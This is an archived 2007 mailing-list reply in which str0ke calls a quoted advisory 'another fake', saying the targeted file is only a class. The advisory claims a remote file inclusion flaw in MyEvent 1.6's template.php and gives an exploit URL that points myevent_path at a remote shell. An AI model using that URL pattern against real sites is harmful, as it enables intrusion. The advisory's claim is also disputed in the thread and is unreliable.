<<< Date Index >>>     <<< Thread Index >>>

Re: MyEvent1.6 (template.php) Remote File Inclusion Vulnerability



Another fake, the entire file is a class.

/str0ke

On 2 Jun 2007 07:07:53 -0000, yaser@xxxxxxxxxxxx <yaser@xxxxxxxxxxxx> wrote:
#########################################################################
 #
 # MyEvent1.6 (template.php) Remote File Inclusion Vulnerability
 #
 # Author:  Yaser <yaser@xxxxxxxxxxxx>
 #
 # Homepage: http://www.ayyildiz.org
 #
 #########################################################################



 #########################################################################
 # Download S : http://mywebland.com/download.php?id=6
 #
 # ERROR:
 #
 # include_once($myevent_path.'includes/template.php')
 #
 # Exploit:
 # http://[site]/[PaTh]/includes/template.php?myevent_path=[shell]
 #
 #########################################################################

 Thanks: ir4dex - ht08 - ajann - H0tturk - Zakix - Devil Hacker